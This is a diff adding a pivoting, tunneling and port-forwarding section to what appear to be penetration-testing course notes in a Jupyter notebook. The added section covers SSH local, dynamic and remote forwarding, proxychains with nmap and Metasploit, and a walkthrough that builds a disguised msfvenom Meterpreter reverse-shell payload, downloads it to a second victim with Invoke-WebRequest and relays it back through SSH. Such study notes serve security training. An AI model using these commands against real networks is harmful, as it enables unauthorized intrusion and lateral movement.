--- a/hnetwork_notes.ipynb
+++ b/hnetwork_notes.ipynb
@@ -68,7 +68,12 @@
     "   * **[Linux Shells and Payloads](#linuxshellsetpayloads)**\n",
     "   * **[Windows Shells and Payloads](#windowsshellsetpayloads)**\n",
     "* **[Metasploit](#metasploitframeworkexpl)**\n",
-    "* **[Brute Forcing](#bruteforcing)**"
+    "* **[Brute Forcing](#bruteforcing)**\n",
+    "* **[Pivoting, Tunneling, and Port Forwarding](#pivotunelportforward)**\n",
+    "   * **[Local/Dynamic Port Forwarding & Metasploit](#portforwardingexplsec)**\n",
+    "   * **[Remote/Reverse Port Forwarding with SSH](#remoterevportforwardssh)**\n",
+    "   * **[Meterpreter Tunneling & Port Forwarding](#meterpretertunnelingetpf)**\n",
+    "   * **[socat](#socatpftunetpiv)**"
    ]
   },
   {
@@ -482,7 +487,7 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
-    "#### **[Introduction to Linux](#linuxintroos)**"
+    "#### **[Configuration and Services](#linuxintroos)**"
    ]
   },
   {
@@ -2041,6 +2046,202 @@
     "\n",
     "```"
    ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id=\"pivotunelportforward\"></a>\n",
+    "\n",
+    "### **`Pivoting, Tunneling, and Port Forwarding`**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Once an initial foothold is gained on a system, it is imperative to check the privilege level, network connections, and potential VPN or other remote access software. If a host has more than one network adapter, it can likely be used to move to a different network segment. All of the following tactics are separate:\n",
+    "\n",
+    "**`Pivoting`** is the idea of moving to other networks through a compromised host to find more targets on different network segments. Pivoting may use multiple hosts to cross network boundaries they would not usually have access to. This enables an attacker to move deeper into a network by compromising targeted hosts or infrastructure. The main objective is to defeat segmentation (physically and virtually) to access an isolated network\n",
+    "   * i.e., the target had their network physically and logically separated, making it difficult for an attacker to move around and fully compromise the network. The attacker had to search the network and compromise a host that had access to another environment, as the endpoint has more than one NIC connected to different networks. This host will now be the jump/pivot host\n",
+    "   * Allows an attacker to delve deeper into the networks accessing previously unreachable environments. \n",
+    "\n",
+    "* **`Tunneling`** is a subset of pivoting: it encapsulates network traffic into another protocol and routes traffic through it. For example, using HTTP to mask the C2 traffic from an attacking server to the host. *Obfuscation* is critical to avoid detection for as long as possible. For tunneling, protocols with enhanced security measures like HTTPS over TLS or SSH over other transport protocols are used. These types of attacks enable tactics like the exfiltration of data out of a target network or the delivery of more payloads and instructions into the network. \n",
+    "   * i.e., typical applications like VPNs or specialized browsers are a form of tunneling network traffic. \n",
+    "   * Tunneling was previously used to craft traffic to hide in HTTP and HTTPS. This is a common way to maintain a C2 of the compromised hosts within a network. Instructions can be masked inside GET and POST requests that appear as normal traffic, essentially looking like a normal web request/response to any website. If the packet were formed properly, it would be forwarded to the control server; if it were not, it would be redirected to another website, potentially throwing off the blue team member checking it out. \n",
+    "\n",
+    "**`Port Forwarding`** is a technique that allows an attacker (or a defender depending on the context) to redirect a communication request from one port to another. This uses TCP as the primary communication layer to provide interactive communication for the forwarded port; however, different application layer protocols like SSH or SOCKS (not L7) can be used to encapsulate the forwarded traffic. This can be effective in bypassing firewalls and using existing services on a compromised host to pivot to other networks. Port forwarding is also a type of pivoting. \n",
+    "\n",
+    "**`Lateral Movement`** is a technique used to further access to additional hosts, apps, and services within a network environment that can help an attacker gain access to specific domain resources to elevate their privileges. This also enables privilege escalation across hosts.\n",
+    "   * i.e., an attacker gains initial access to the target environment, and compromised a local admin account. They performed a network scan and found three more Windows hosts in the network. The attacker used the same local admin credentials, and one of those devices shared the same administrator account, ultimately helping them compromise the domain further. \n",
+    "   * Helps spread wide within a network, elevating privileges"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id=\"portforwardingexplsec\"></a>\n",
+    "\n",
+    "#### **`Local/Dynamic Port Forwarding & Metasploit`**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "**<u>Local Port Forwarding</u>**\n",
+    "\n",
+    "Assume the attack host is on the 10.10.15.0/24 network and the target server is on a 10.129/16 network, which has already been compromised. First, scan the target server to search for open ports, as follows:\n",
+    "```bash\n",
+    "nmap -sT -p22,3306 10.129.202.64\n",
+    "\n",
+    "```\n",
+    "In this example, the SSH port is open; however, to access the MySQL service, the attacker can either SSH into the server and access MySQL from inside the server, or port forward it to their localhost on an arbitrary port (i.e., 1234) and access it locally. \n",
+    "* If a remote exploit on the MySQL service is to be done, port forwarding must happen because in this case, MySQL is being hosted locally on the server on port 3306. \n",
+    "\n",
+    "To accomplish this, the attacker's local port (1234) must be forwarded over SSH to the server. The `-L` command tells the SSH client to request the SSH server to forward all the data that is to be sent port 1234 to localhost:3306 on the server. By doing this, the attacker should be able to access the MySQL service locally on port 1234:\n",
+    "```bash\n",
+    "ssh -L 1234:localhost:3306 ubuntu@10.129.202.64\n",
+    "\n",
+    "```\n",
+    "To verify whether the MySQL service was forwarded, use Netstat or Nmap to query the localhost on port 1234\n",
+    "```bash\n",
+    "netstat -antp | grep 1234\n",
+    "\n",
+    "nmap -v -sV -p1234 localhost\n",
+    "\n",
+    "```\n",
+    "\n",
+    "If multiple ports are to be forwarded from the server to the localhost, the same syntax is used multiple times (`local_port:server:port`) to the ssh command. For example, the following command forwards the apache web server's port 80 to the attack host's local port on 8080 in addition to forwarding the server's MySQL service on port 3306 to the host's local port on 1234:\n",
+    "```bash\n",
+    "ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64\n",
+    "\n",
+    "```\n",
+    "\n",
+    "**<u>Dynamic Port Forwarding</u>**\n",
+    "\n",
+    "Once on the compromised host, enumerate the network to see what networks the target is connected to by looking at its interfaces:\n",
+    "   * ip a for Linux\n",
+    "   * ipconfig /all for Windows\n",
+    "\n",
+    "From the previous example, MySQL (port 3306) was known to be open from the target machine. This is never the case; it is highly unlikely for an attacker to know which services lie on the other side of the network, so either a smaller range of IPs on the network or the entire subnet can be scanned. \n",
+    "* It is important to note that this scan cannot be directly performed from the attacking machine because it will likely not have the proper routes to the network. To do this, perform a dynamic port forwarding and pivot the network packets via the already compromised target.\n",
+    "   * This can be done by starting a SOCKS listener on the local host, and then configuring SSH to forward that traffic via SSH to the corresponding network after connecting to the target host. This is called **SSH tunneling over SOCKS (Socket Secure) proxy.** \n",
+    "      * SOCKS is a protocol that helps communicate with machines where there are firewall restrictions in place. In the case of SOCKS, the initial traffic is generated by a SOCKS client, which connects to the SOCKS server controlled by the user who wants to access a service on the client-side. Once the connection is established, network traffic can be routed through the SOCKS server on behalf of the connected client. \n",
+    "\n",
+    "This technique is often used to circumvent the restrictions put in place by firewalls, and allow an external entity to bypass the firewall and access a service within the firewalled environment. A SOCKS proxy can also be useful for pivoting and forwarding data, as they can pivot via creating a route to an external server from NAT networks. As of now, there are currently two types of SOCKS proxies: SOCKS4 and SOCKS5. SOCKS4 doesn't provide any authentication and UDP support, whereas SOCKS5 does. \n",
+    "\n",
+    "Assume an attacker starts an SSH client and requests the SSH server to allow it to send some TCP data over the ssh socket. The SSH server responds with an acknowledgement, and the SSH client then starts listening on localhost:9050. Whatever data sent to this port will be broadcasted to the entire network over SSH. The following command can be used to perform this dynamic port forwarding:\n",
+    "```bash\n",
+    "ssh -D 9050 ubuntu@10.129.202.64       #IP of the already compromised machine\n",
+    "\n",
+    "```\n",
+    "The `-D` argument requests the SSH server to enable dynamic port forwarding. Once this has been enabled, **proxychains** is needed to route any tool's packets over the port 9050 (in this example), which is capable of redirecting TCP connections through TOR, SOCKS, and HTTP/HTTPS proxy servers and also allows attackers to chain multiple proxy servers together. Using proxychains, the IP address of the requesting host can be hidden as well since the receiving host will only see the IP of the pivot host. Proxychains is often used to force an application's TCP traffic to go through hosted proxies like SOCKS4/SOCKS5, TOR, or HTTP/HTTPS proxies. \n",
+    "\n",
+    "To inform proxychains that port 9050 is to be used, modify the proxychains configuration file (/etc/proxychains.conf). Then, add socks4 127.0.0.1 9050 to the last line if it is not laready there. Once this is done, start nmap with proxy chains using the following command, as it will route all the packets of nmap to the local port 9050, where the SSH client is listening, which will forward all the packets over SSH to the remote network (unaccessible from the attack host, but accessible from the target machine since it is directly connected to this network):\n",
+    "```bash\n",
+    "proxychains nmap -v -sn 172.16.5.1-200\n",
+    "\n",
+    "```\n",
+    "This part of packing all of the nmap data using proxychains and forwarding it to a remote server is called **SOCKS tunneling;** however, only full TCP connect scans can be done over proxychains because proxychains cannot understand partial packets. If partial packets (half connect scans) are sent, the yielded results will be incorrect. Also, it is imperative to remember that host-alive checks may not work against Windows targets because the Windows Defender firewall blocks ICMP requests by default. A full TCP connect scan without ping on an entire network range will also take a long time too. \n",
+    "\n",
+    "The following command performs a remote system scan, which may disclose several open ports:\n",
+    "```bash\n",
+    "proxychains nmap -v -Pn -sT 172.16.5.19\n",
+    "\n",
+    "```\n",
+    "Similar to the nmap scan, pivoting can also be done from msfconsole via proxychains to perform scans of the detected ports/services using metasploit auxiliary modules. \n",
+    "\n",
+    "**<u>Using Metasploit with Proxychains</u>**\n",
+    "\n",
+    "First, start msfconsole with proxychains. In this case, all associated traffic will be sent through the establushed proxy:\n",
+    "```bash\n",
+    "proxychains msfconsole\n",
+    "\n",
+    "```\n",
+    "The next step depends on what ports were found on the remote machine. For example, the rdp_scanner auxiliary module can be used to check if the host on the internal network is listening on 3389. Regardless of the chosen module, set the rhosts as the remote machine. Depending on the level of access to the host, it may be possible to try to run an exploit or log in using gathered credentials. "
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id=\"remoterevportforwardssh\"></a>\n",
+    "\n",
+    "#### **`Remote/Reverse Port Forwarding with SSH`**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "It is possible to forward a local service to a remote port; consider a situation where it is possible to RDP into a target machine from the initial compromised machine via port forwarding, such as that demonstrated from the last example. However, if trying to hain a reverse shell, the process may complicate. For this example, assume the following IP addresses on each machine:\n",
+    "* Attacking machine: 10.10.15.5\n",
+    "* Victim 1 (initial target): 10.129.15.50 & 172.16.5.129\n",
+    "* Victim 2 (secondary target): 172.16.5.19\n",
+    "\n",
+    "In this case, the outgoing connection for the Windows host will be limited to its own subnet (i.e., 172.16.5.0/23) because it does not have any direct connection with the network the attack host is on. It won't be possible to get a direct connection if a metasploit listener is started on the attack host to get a reverse shell, as the Windows machine doesn't know how to route traffic leaving its network to reach the network of the attacking machine (10.129.x.x)\n",
+    "* It may not always be feasible to have a remote desktop connection; it sometimes may be better to upload/download files (when the RDP clipboard is disabed), use exploits or low-level Windows API using a Meterpreter session to perform enumeration on the Windows host, which is not possible using the built-in Windows executables. \n",
+    "\n",
+    "In these cases, find a pivot host: a common connection between the attack host and secondary target. In this case specifically, the pivot host would be Victim 1 since it can connect with both the attacking machine and secondary target. **To gain a Meterpreter shell on Windows, create a Meterpreter HTTPS payload using msfvenom, but the configuration of the reverse connection for the payload would be the primary target's host IP address (172.16.5.129).** The following uses port 8080 on the primary target to forward all the reverse packets to the attack hosts' 8000 port, where the metasploit listener is running:\n",
+    "```bash\n",
+    "msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.129 -f exe -o backupscript.exe LPORT=8080\n",
+    "\n",
+    "use exploit/multi/handler\n",
+    "set lhost 0.0.0.0\n",
+    "set lport 8000\n",
+    "run\n",
+    "\n",
+    "```\n",
+    "Once the payload is created and the listener is configured and running, copy the payload to the primary target machine. If credentials are known, use scp. After copying the payload, start an HTTP server on the primary initial target machine in the same directory as the copied payload with an arbitrary port (i.e., 8123). At this point, download the malicious payload via a web browser or the PowerShell cmdlet Invoke-WebRequest on the secondary target machine, as follows:\n",
+    "```powershell\n",
+    "Invoke-WebRequest -Uri \"http://172.16.5.129:8123/backupscript.exe\" -OutFile \"C:\\backupscript.exe\"\n",
+    "\n",
+    "```\n",
+    "Once the payload is downloaded on the secondary target, use SSH remote port forwarding to forward connections from the initial target's port 8080 to the msfconsole's listener service on port 8000. With the following command, the `-vN` argument must be used to make it verbose and ask it not to prompt the login shell, and the `-R` command asks the initial target to listen on the interface of connected to the secondary target (the IP address that links the initial target and the secondary target), and forward all incoming connections on port 8080 to the msfconsole listener on 0.0.0.0:8000 of the attack host:\n",
+    "```bash\n",
+    "ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.15.50 -vN\n",
+    "\n",
+    "```\n",
+    "After creating the SSH remote port forward, execute the payload from the secondary target. If the payload is executed as intended and attempts to connect back to the listener, see the logs from the pivot on the pivot host. If all is set up properly, a meterpreter shell will be obtained pivoted via the initial target. The meterpreter session should list the incoming connection is from a localhost itself since it is receiving the connection over the local SSH socket, which creates an outbound connection to the initial target. Issuing the netstat command shows that the incoming connection is from SSH."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id=\"meterpretertunnelingetpf\"></a>\n",
+    "\n",
+    "#### **`Meterpreter Tunneling & Port Forwarding`**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "\n",
+    "\n",
+    "\n",
+    "\n",
+    "\n",
+    "\n",
+    "\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id=\"socatpftunetpiv\"></a>\n",
+    "\n",
+    "#### **`socat`**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": []
   },
   {
    "cell_type": "markdown",
@@ -11646,7 +11847,7 @@
    "source": [
     "<a id=\"linuxintroos\"></a>\n",
     "\n",
-    "### **`Introduction to Linux`**"
+    "### **`Configuration and Services`**"
    ]
   },
   {
